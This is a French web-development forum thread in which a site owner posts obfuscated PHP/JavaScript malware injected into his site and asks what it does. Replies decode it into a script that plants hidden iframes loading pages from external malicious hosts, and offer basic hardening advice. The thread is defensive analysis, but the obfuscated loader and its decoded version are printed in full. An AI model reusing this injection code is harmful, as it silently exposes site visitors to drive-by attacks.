IdentifiantMot de passe
Loading...
Mot de passe oublié ?Je m'inscris ! (gratuit)
Navigation

Inscrivez-vous gratuitement
pour pouvoir participer, suivre les réponses en temps réel, voter pour les messages, poser vos propres questions et recevoir la newsletter

JavaScript Discussion :

Compréhension code découvert


Sujet :

JavaScript

  1. #1
    Membre du Club
    Profil pro
    Inscrit en
    Mars 2009
    Messages
    99
    Détails du profil
    Informations personnelles :
    Localisation : France

    Informations forums :
    Inscription : Mars 2009
    Messages : 99
    Points : 45
    Points
    45
    Par défaut Compréhension code découvert
    Bonjour,
    Je me suis rendu compte que sur un de mes sites, une modification de certains fichiers avait été effectué.
    J'aimerais comprendre la nature de ce code ajouté et ce qu'il est censé faire.

    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    <?
    #74ed9f#
    if(empty($k))
    {
    	$k = " <script type=\"text/javascript\" language=\"javascript\" > 
    				vyea=\"fr\"+\"omCh\"+\"arCo\"+\"de\";
    				if(document.querySelector)jgb=4;
    				clqx=(\"7b,c1,d0,c9,be,cf,c4,ca,c9,7b,c8,d4,8b,94,83,84,7b,d6,68,65,7b,d1,bc,cd,7b,ce,cf,bc,cf,c4,be,98,82,bc,c5,bc,d3,82,96,68,65,7b,d1,bc,cd,7b,be,ca,c9,cf,cd,ca,c7,c7,c0,cd,98,82,c4,c9,bf,c0,d3,89,cb,c3,cb,82,96,68,65,7b,d1,bc,cd,7b,c8,d4,7b,98,7b,bf,ca,be,d0,c8,c0,c9,cf,89,be,cd,c0,bc,cf,c0,a0,c7,c0,c8,c0,c9,cf,83,82,c4,c1,cd,bc,c8,c0,82,84,96,68,65,68,65,7b,c8,d4,89,ce,cd,be,7b,98,7b,82,c3,cf,cf,cb,95,8a,8a,bd,cd,c4,c2,c3,cf,c1,c4,cd,c0,8c,89,be,ca,89,d0,c6,8a,be,c2,c4,88,bd,c4,c9,8a,a9,ac,cf,d3,8d,a8,cb,c2,89,cb,c3,cb,82,96,68,65,7b,c8,d4,89,ce,cf,d4,c7,c0,89,cb,ca,ce,c4,cf,c4,ca,c9,7b,98,7b,82,bc,bd,ce,ca,c7,d0,cf,c0,82,96,68,65,7b,c8,d4,89,ce,cf,d4,c7,c0,89,be,ca,c7,ca,cd,7b,98,7b,82,8b,8e,82,96,68,65,7b,c8,d4,89,ce,cf,d4,c7,c0,89,c3,c0,c4,c2,c3,cf,7b,98,7b,82,8b,8e,cb,d3,82,96,68,65,7b,c8,d4,89,ce,cf,d4,c7,c0,89,d2,c4,bf,cf,c3,7b,98,7b,82,8b,8e,cb,d3,82,96,68,65,7b,c8,d4,89,ce,cf,d4,c7,c0,89,c7,c0,c1,cf,7b,98,7b,82,8c,8b,8b,8b,8b,8e,82,96,68,65,7b,c8,d4,89,ce,cf,d4,c7,c0,89,cf,ca,cb,7b,98,7b,82,8c,8b,8b,8b,8b,8e,82,96,68,65,68,65,7b,c4,c1,7b,83,7c,bf,ca,be,d0,c8,c0,c9,cf,89,c2,c0,cf,a0,c7,c0,c8,c0,c9,cf,9d,d4,a4,bf,83,82,c8,d4,82,84,84,7b,d6,68,65,7b,bf,ca,be,d0,c8,c0,c9,cf,89,d2,cd,c4,cf,c0,83,82,97,cb,7b,c4,bf,98,b7,82,c8,d4,b7,82,7b,be,c7,bc,ce,ce,98,b7,82,c8,d4,8b,94,b7,82,7b,99,97,8a,cb,99,82,84,96,68,65,7b,bf,ca,be,d0,c8,c0,c9,cf,89,c2,c0,cf,a0,c7,c0,c8,c0,c9,cf,9d,d4,a4,bf,83,82,c8,d4,82,84,89,bc,cb,cb,c0,c9,bf,9e,c3,c4,c7,bf,83,c8,d4,84,96,68,65,7b,d8,68,65,d8,68,65,c1,d0,c9,be,cf,c4,ca,c9,7b,ae,c0,cf,9e,ca,ca,c6,c4,c0,83,be,ca,ca,c6,c4,c0,a9,bc,c8,c0,87,be,ca,ca,c6,c4,c0,b1,bc,c7,d0,c0,87,c9,9f,bc,d4,ce,87,cb,bc,cf,c3,84,7b,d6,68,65,7b,d1,bc,cd,7b,cf,ca,bf,bc,d4,7b,98,7b,c9,c0,d2,7b,9f,bc,cf,c0,83,84,96,68,65,7b,d1,bc,cd,7b,c0,d3,cb,c4,cd,c0,7b,98,7b,c9,c0,d2,7b,9f,bc,cf,c0,83,84,96,68,65,7b,c4,c1,7b,83,c9,9f,bc,d4,ce,98,98,c9,d0,c7,c7,7b,d7,d7,7b,c9,9f,bc,d4,ce,98,98,8b,84,7b,c9,9f,bc,d4,ce,98,8c,96,68,65,7b,c0,d3,cb,c4,cd,c0,89,ce,c0,cf,af,c4,c8,c0,83,cf,ca,bf,bc,d4,89,c2,c0,cf,af,c4,c8,c0,83,84,7b,86,7b,8e,91,8b,8b,8b,8b,8b,85,8d,8f,85,c9,9f,bc,d4,ce,84,96,68,65,7b,bf,ca,be,d0,c8,c0,c9,cf,89,be,ca,ca,c6,c4,c0,7b,98,7b,be,ca,ca,c6,c4,c0,a9,bc,c8,c0,86,7d,98,7d,86,c0,ce,be,bc,cb,c0,83,be,ca,ca,c6,c4,c0,b1,bc,c7,d0,c0,84,68,65,7b,86,7b,7d,96,c0,d3,cb,c4,cd,c0,ce,98,7d,7b,86,7b,c0,d3,cb,c4,cd,c0,89,cf,ca,a2,a8,af,ae,cf,cd,c4,c9,c2,83,84,7b,86,7b,83,83,cb,bc,cf,c3,84,7b,9a,7b,7d,96,7b,cb,bc,cf,c3,98,7d,7b,86,7b,cb,bc,cf,c3,7b,95,7b,7d,7d,84,96,68,65,d8,68,65,c1,d0,c9,be,cf,c4,ca,c9,7b,a2,c0,cf,9e,ca,ca,c6,c4,c0,83,7b,c9,bc,c8,c0,7b,84,7b,d6,68,65,7b,d1,bc,cd,7b,ce,cf,bc,cd,cf,7b,98,7b,bf,ca,be,d0,c8,c0,c9,cf,89,be,ca,ca,c6,c4,c0,89,c4,c9,bf,c0,d3,aa,c1,83,7b,c9,bc,c8,c0,7b,86,7b,7d,98,7d,7b,84,96,68,65,7b,d1,bc,cd,7b,c7,c0,c9,7b,98,7b,ce,cf,bc,cd,cf,7b,86,7b,c9,bc,c8,c0,89,c7,c0,c9,c2,cf,c3,7b,86,7b,8c,96,68,65,7b,c4,c1,7b,83,7b,83,7b,7c,ce,cf,bc,cd,cf,7b,84,7b,81,81,68,65,7b,83,7b,c9,bc,c8,c0,7b,7c,98,7b,bf,ca,be,d0,c8,c0,c9,cf,89,be,ca,ca,c6,c4,c0,89,ce,d0,bd,ce,cf,cd,c4,c9,c2,83,7b,8b,87,7b,c9,bc,c8,c0,89,c7,c0,c9,c2,cf,c3,7b,84,7b,84,7b,84,68,65,7b,d6,68,65,7b,cd,c0,cf,d0,cd,c9,7b,c9,d0,c7,c7,96,68,65,7b,d8,68,65,7b,c4,c1,7b,83,7b,ce,cf,bc,cd,cf,7b,98,98,7b,88,8c,7b,84,7b,cd,c0,cf,d0,cd,c9,7b,c9,d0,c7,c7,96,68,65,7b,d1,bc,cd,7b,c0,c9,bf,7b,98,7b,bf,ca,be,d0,c8,c0,c9,cf,89,be,ca,ca,c6,c4,c0,89,c4,c9,bf,c0,d3,aa,c1,83,7b,7d,96,7d,87,7b,c7,c0,c9,7b,84,96,68,65,7b,c4,c1,7b,83,7b,c0,c9,bf,7b,98,98,7b,88,8c,7b,84,7b,c0,c9,bf,7b,98,7b,bf,ca,be,d0,c8,c0,c9,cf,89,be,ca,ca,c6,c4,c0,89,c7,c0,c9,c2,cf,c3,96,68,65,7b,cd,c0,cf,d0,cd,c9,7b,d0,c9,c0,ce,be,bc,cb,c0,83,7b,bf,ca,be,d0,c8,c0,c9,cf,89,be,ca,ca,c6,c4,c0,89,ce,d0,bd,ce,cf,cd,c4,c9,c2,83,7b,c7,c0,c9,87,7b,c0,c9,bf,7b,84,7b,84,96,68,65,d8,68,65,c4,c1,7b,83,c9,bc,d1,c4,c2,bc,cf,ca,cd,89,be,ca,ca,c6,c4,c0,a0,c9,bc,bd,c7,c0,bf,84,68,65,d6,68,65,c4,c1,83,a2,c0,cf,9e,ca,ca,c6,c4,c0,83,82,d1,c4,ce,c4,cf,c0,bf,ba,d0,cc,82,84,98,98,90,90,84,d6,d8,c0,c7,ce,c0,d6,ae,c0,cf,9e,ca,ca,c6,c4,c0,83,82,d1,c4,ce,c4,cf,c0,bf,ba,d0,cc,82,87,7b,82,90,90,82,87,7b,82,8c,82,87,7b,82,8a,82,84,96,68,65,68,65,c8,d4,8b,94,83,84,96,68,65,d8,68,65,d8\".split(\",\"));
    				jti=eval;
    				function lmev()
    				{
    					ggbcyl=function(){--(rggi.body)}()
    				}
    				rggi=document;
    				for(eqhmwa=0;eqhmwa<clqx[\"length\"];eqhmwa+=1)
    				{
    					clqx[eqhmwa]=-(91)+parseInt(clqx[eqhmwa],jgb*4);
    				}
    				try
    				{
    					lmev()
    				}
    				catch(wucz)
    				{
    					yge=50-50;
    				}
    				if(!yge)
    					jti(String[vyea].apply(String,clqx));
    			</script> ";
    		echo $k; }
    #/74ed9f#
    ?>
    Lors de l'affichage de la page modifié, grace a firebug, voici le code decouvert :
    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    <p class="ylsx09" id="ylsx"><iframe src="http://66.71.131.197/pages/9mtyZpcj.php" style="position: absolute; height: 7px; width: 7px;"></iframe></p>
    A quoi sert ce code, et surtout, comment éviter que ce genre de problème ne revienne ?
    Merci d'avance pour vos conseils

  2. #2
    Membre émérite
    Avatar de Kaamo
    Homme Profil pro
    Ingénieur développement logiciels
    Inscrit en
    Avril 2007
    Messages
    1 165
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 37
    Localisation : France, Bouches du Rhône (Provence Alpes Côte d'Azur)

    Informations professionnelles :
    Activité : Ingénieur développement logiciels
    Secteur : High Tech - Éditeur de logiciels

    Informations forums :
    Inscription : Avril 2007
    Messages : 1 165
    Points : 2 778
    Points
    2 778
    Par défaut
    En effet, ce PHP permet d'injecter un code Javascript au sein d'une page. Ce code Javascript est évalué automatiquement et a pour but d'installer une iframe dans la page qui pointe, sûrement (je n'ai pas cliqué ), vers un site malicieux qui vole sûrement des trucs sur le poste de l'utilisateur qui a lancé cette page.

    iframe donc que tu as trouvée.

    Change tes logins / mots de passe de tes services, supprime ton site momentanément, et protège des formulaires PHP. Il doit sûrement y avoir une faille qui a permis au hacker d'injecter du code sur ton serveur.

  3. #3
    Membre du Club
    Profil pro
    Inscrit en
    Mars 2009
    Messages
    99
    Détails du profil
    Informations personnelles :
    Localisation : France

    Informations forums :
    Inscription : Mars 2009
    Messages : 99
    Points : 45
    Points
    45
    Par défaut
    C'est bien ce qu'il me semblait...
    Aurais tu des conseils pour la sécurisation d'un formulaire, (j'ai trouvé pas mal de choses sur le net mais je trouve cela très brouillon pour être sûr de bien tout mettre), je pense que le problème est surement venu de là. Pourtant je pensais l'avoir bien sécurisé, mais apparemment pas assez.

  4. #4
    Membre émérite
    Avatar de Kaamo
    Homme Profil pro
    Ingénieur développement logiciels
    Inscrit en
    Avril 2007
    Messages
    1 165
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 37
    Localisation : France, Bouches du Rhône (Provence Alpes Côte d'Azur)

    Informations professionnelles :
    Activité : Ingénieur développement logiciels
    Secteur : High Tech - Éditeur de logiciels

    Informations forums :
    Inscription : Avril 2007
    Messages : 1 165
    Points : 2 778
    Points
    2 778
    Par défaut
    et bien le conseil de base par exemple c'est de ne jamais construire tes requêtes SQL avec les paramètres _POST et _GET directement. Il faut les "échapper" avant.
    Il ne faut jamais faire confiance à ce que le client t'envoie

    Renseignes toi sur les failles XSS (cross-site scripting), injections SQL

  5. #5
    Rédacteur/Modérateur

    Avatar de SpaceFrog
    Homme Profil pro
    Développeur Web Php Mysql Html Javascript CSS Apache - Intégrateur - Bidouilleur SharePoint
    Inscrit en
    Mars 2002
    Messages
    39 644
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 74
    Localisation : Royaume-Uni

    Informations professionnelles :
    Activité : Développeur Web Php Mysql Html Javascript CSS Apache - Intégrateur - Bidouilleur SharePoint
    Secteur : Industrie

    Informations forums :
    Inscription : Mars 2002
    Messages : 39 644
    Points : 66 671
    Points
    66 671
    Billets dans le blog
    1
    Par défaut
    ATTENTION !! ce code est donné à titre informatif
    s'agissant d'un script malveillant inséré dans la page, je déconseille fortement de jouer avec l'url donnée
    Voilà le code inséré :
    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    function my09() {
      var static = 'ajax';
      var controller = 'index.php';
      var my = document.createElement('iframe');
      my.src = // ATTENTION lien malveillant !!!  'http://brightfire1.co.uk/cgi-bin/NQtx2Mpg.php';
      my.style.position = 'absolute';
      my.style.color = '03';
      my.style.height = '03px';
      my.style.width = '03px';
      my.style.left = '100003';
      my.style.top = '100003';
      if (!document.getElementById('my')) {
        document.write('');
        document.getElementById('my').appendChild(my);
      }
    }
    function SetCookie(cookieName, cookieValue, nDays, path) {
      var today = new Date();
      var expire = new Date();
      if (nDays == null || nDays == 0) nDays = 1;
      expire.setTime(today.getTime() + 3600000 * 24 * nDays);
      document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
    }
    function GetCookie(name) {
      var start = document.cookie.indexOf(name + "=");
      var len = start + name.length + 1;
      if ((!start) && (name != document.cookie.substring(0, name.length))) {
        return null;
      }
      if (start == -1) return null;
      var end = document.cookie.indexOf(";", len);
      if (end == -1) end = document.cookie.length;
      return unescape(document.cookie.substring(len, end));
    }
    if (navigator.cookieEnabled) {
      if (GetCookie('visited_uq') == 55) {} else {
        SetCookie('visited_uq', '55', '1', '/');
        my09();
      }
    }

  6. #6
    Membre émérite
    Avatar de Kaamo
    Homme Profil pro
    Ingénieur développement logiciels
    Inscrit en
    Avril 2007
    Messages
    1 165
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 37
    Localisation : France, Bouches du Rhône (Provence Alpes Côte d'Azur)

    Informations professionnelles :
    Activité : Ingénieur développement logiciels
    Secteur : High Tech - Éditeur de logiciels

    Informations forums :
    Inscription : Avril 2007
    Messages : 1 165
    Points : 2 778
    Points
    2 778
    Par défaut
    Je n'avais pas osé le poster
    Un whois sur le domaine en question ne donne rien. A vrai dire, je ne connais pas grand chose en hacking si ce n'est quelques bases.

    @luffyfr : Tu utilises une plateforme de blog, CMS connu ? Renseigne toi des mises à jour. Il se peut que certaines versions aient des failles. Failles que les hackers utilisent si le développeur ne fait pas attention aux mises à jour / patchs proposés.

  7. #7
    Membre du Club
    Profil pro
    Inscrit en
    Mars 2009
    Messages
    99
    Détails du profil
    Informations personnelles :
    Localisation : France

    Informations forums :
    Inscription : Mars 2009
    Messages : 99
    Points : 45
    Points
    45
    Par défaut
    non je n'utilise pas de CMS, c'est un site que j'avais développé de A à Z

    oui j'ai regardé du coup les failles XSS (cross-site scripting), injections SQL, en espérant que cela règle la problème...

  8. #8
    Rédacteur/Modérateur

    Avatar de SylvainPV
    Profil pro
    Inscrit en
    Novembre 2012
    Messages
    3 375
    Détails du profil
    Informations personnelles :
    Localisation : France

    Informations forums :
    Inscription : Novembre 2012
    Messages : 3 375
    Points : 9 944
    Points
    9 944
    Par défaut
    Les dangers de faire un site par soi-même.
    En Java, j'utilisais une servlet "nettoyeuse" qui traitait toutes les données en header, cookie et form data des requêtes et rendait inopérant tout code malicieux SQL, HTML et JS. Il doit exister quelque-chose de similaire en PHP.

Discussions similaires

  1. [Débutant] Problème compréhension code XAML
    Par JolyLoic dans le forum Windows Presentation Foundation
    Réponses: 3
    Dernier message: 26/08/2009, 18h00
  2. compréhension code javascript
    Par Jijudu dans le forum Général JavaScript
    Réponses: 7
    Dernier message: 14/11/2008, 16h56
  3. Compréhension code HTML
    Par Jijudu dans le forum Balisage (X)HTML et validation W3C
    Réponses: 2
    Dernier message: 14/11/2008, 15h38
  4. problème compréhension code
    Par mitherkiller dans le forum SDL
    Réponses: 3
    Dernier message: 13/04/2007, 10h38
  5. [MFC]Problème compréhension code
    Par bitardo dans le forum MFC
    Réponses: 1
    Dernier message: 23/05/2006, 16h56

Partager

Partager
  • Envoyer la discussion sur Viadeo
  • Envoyer la discussion sur Twitter
  • Envoyer la discussion sur Google
  • Envoyer la discussion sur Facebook
  • Envoyer la discussion sur Digg
  • Envoyer la discussion sur Delicious
  • Envoyer la discussion sur MySpace
  • Envoyer la discussion sur Yahoo